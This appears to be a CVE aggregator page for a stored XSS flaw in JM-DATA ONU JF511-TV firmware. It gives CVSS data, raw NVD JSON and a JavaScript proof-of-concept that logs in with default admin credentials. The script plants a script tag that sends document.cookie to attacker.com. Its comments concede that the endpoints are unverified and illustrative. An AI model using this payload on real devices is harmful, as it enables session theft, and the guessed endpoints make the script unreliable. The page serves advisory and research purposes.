Security Vulnerability Report
CVE-2022-50801 CVSS 4.3 MEDIUM

CVE-2022-50801

Published: 2025-12-30 23:15:47
Last Modified: 2026-04-15 00:35:42

Description

JM-DATA ONU JF511-TV version 1.0.67 is vulnerable to authenticated stored cross-site scripting (XSS) attacks, allowing attackers with authenticated access to inject malicious scripts that will be executed in other users' browsers when they view the affected content.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

JM-DATA ONU JF511-TV < 1.0.67
JM-DATA ONU JF511-TV version 1.0.67

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2022-50801 - stored XSS demonstration for JM-DATA ONU JF511-TV (authenticated).
//
// NOTE(review): the advisory text on this page names no endpoint or parameter.
// The /login and /api/device/config paths and the device_name field used below
// are unverified against it; treat them as illustrative, not as confirmed
// details of the device firmware.
//
// Defensive reading: the script depends on (1) a successful login to the
// management interface and (2) a configuration value being stored and later
// rendered without HTML output encoding. Restricting who can reach and sign in
// to the management interface, and encoding stored values on output, each
// break that chain.
const axios = require('axios');

// Lab settings: management address of the device under test and the account
// used to sign in.
const TARGET = 'http://192.168.1.1';
const USERNAME = 'admin';
const PASSWORD = 'admin';

// Markup written into the configuration field. If a page renders it unencoded,
// the viewer's browser runs it and sends document.cookie to an external host.
// A session cookie flagged HttpOnly is not readable through document.cookie.
// Script markup appearing in a stored device-name value is the indicator to
// look for when auditing saved configuration.
const xssPayload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>';

/**
 * Signs in, then writes the payload into the device configuration.
 * A failure at either step is caught and reported on stderr; nothing is rethrown.
 *
 * @returns {Promise<void>}
 */
async function exploit() {
  const credentials = { username: USERNAME, password: PASSWORD };
  const configBody = {
    device_name: xssPayload,
    description: 'JM-DATA ONU JF511-TV',
    version: '1.0.67'
  };

  try {
    // Authenticate and keep whatever Set-Cookie values the device returns.
    const authResponse = await axios.post(`${TARGET}/login`, credentials);
    const sessionCookies = authResponse.headers['set-cookie'];

    // Submit the configuration change with the session attached.
    const requestOptions = { headers: { Cookie: sessionCookies } };
    await axios.post(`${TARGET}/api/device/config`, configBody, requestOptions);

    console.log('[+] XSS payload injected successfully');
    console.log('[+] Payload will execute when admin views device info');
  } catch (error) {
    console.error('[-] Exploitation failed:', error.message);
  }
}

exploit();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50801", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:47.470", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "JM-DATA ONU JF511-TV version 1.0.67 is vulnerable to authenticated stored cross-site scripting (XSS) attacks, allowing attackers with authenticated access to inject malicious scripts that will be executed in other users' browsers when they view the affected content."}, {"lang": "es", "value": "JM-DATA ONU JF511-TV versión 1.0.67 es vulnerable a ataques de cross-site scripting (XSS) almacenado autenticado, lo que permite a los atacantes con acceso autenticado inyectar scripts maliciosos que se ejecutarán en los navegadores de otros usuarios cuando visualicen el contenido afectado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2022060058", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/229343", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/167487/", "source": "[email protected]"}, {"url": "https://www.jm-data.com/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/jm-data-onu-jf-tv-authenticated-stored-cross-site-scripting-xss-vulnerability", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5708.php", "source": "[email protected]"}]}}